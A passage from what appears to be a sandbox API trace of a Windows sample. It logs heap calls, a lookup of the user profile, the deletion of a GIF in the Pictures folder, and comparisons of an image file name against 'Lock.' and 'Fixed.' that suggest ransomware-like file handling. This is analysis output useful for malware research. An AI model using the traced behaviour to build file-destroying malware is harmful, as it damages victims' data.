hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0256.367] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/QrlF.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\QrlF.gif", lpFilePart=0x8bedfc*="QrlF.gif") returned 0x2f [0256.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0256.367] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\QrlF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qrlf.gif")) returned 0x20 [0256.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\QrlF.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf040940, ftCreationTime.dwHighDateTime=0x1d4c68e, ftLastAccessTime.dwLowDateTime=0xe93e2810, ftLastAccessTime.dwHighDateTime=0x1d4d021, ftLastWriteTime.dwLowDateTime=0xe93e2810, ftLastWriteTime.dwHighDateTime=0x1d4d021, nFileSizeHigh=0x0, nFileSizeLow=0x18374, dwReserved0=0x1677, dwReserved1=0x4, cFileName="QrlF.gif", cAlternateFileName="")) returned 0xaa5860 [0256.367] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\QrlF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qrlf.gif")) returned 1 [0256.369] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf040940, ftCreationTime.dwHighDateTime=0x1d4c68e, ftLastAccessTime.dwLowDateTime=0xe93e2810, ftLastAccessTime.dwHighDateTime=0x1d4d021, ftLastWriteTime.dwLowDateTime=0xe93e2810, ftLastWriteTime.dwHighDateTime=0x1d4d021, nFileSizeHigh=0x0, nFileSizeLow=0x18374, dwReserved0=0x1677, dwReserved1=0x4, cFileName="QrlF.gif", cAlternateFileName="")) returned 0 [0256.369] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0256.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.370] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0256.370] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0256.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0256.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.371] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0256.373] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/QrlF.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\QrlF.gif", lpFilePart=0x8bf658*="QrlF.gif") returned 0x2f [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0256.373] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\QrlF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qrlf.gif")) returned 0xffffffff [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.373] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0256.374] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.374] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SLYhvryE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYhvryE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YhvryE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hvryE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vryE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ryE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yE1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJ5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.375] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SLYhvryE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYhvryE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YhvryE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hvryE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vryE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ryE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yE1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJ5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J5.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.376] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0256.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0256.376] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0256.376] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0256.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.377] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.377] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.377] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0256.377] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.377] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/SLYhvryE1GJ5.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9256b960, ftCreationTime.dwHighDateTime=0x1d4c9f3, ftLastAccessTime.dwLowDateTime=0xd4867660, ftLastAccessTime.dwHighDateTime=0x1d4caaa, ftLastWriteTime.dwLowDateTime=0xd4867660, ftLastWriteTime.dwHighDateTime=0x1d4caaa, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0x9ef0047, dwReserved1=0x1f598, cFileName="SLYhvryE1GJ5.png", cAlternateFileName="SLYHVR~1.PNG")) returned 0xaa5860 [0256.378] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0256.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.379] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.379] HeapFree (in: hHeap=0x25c0000, 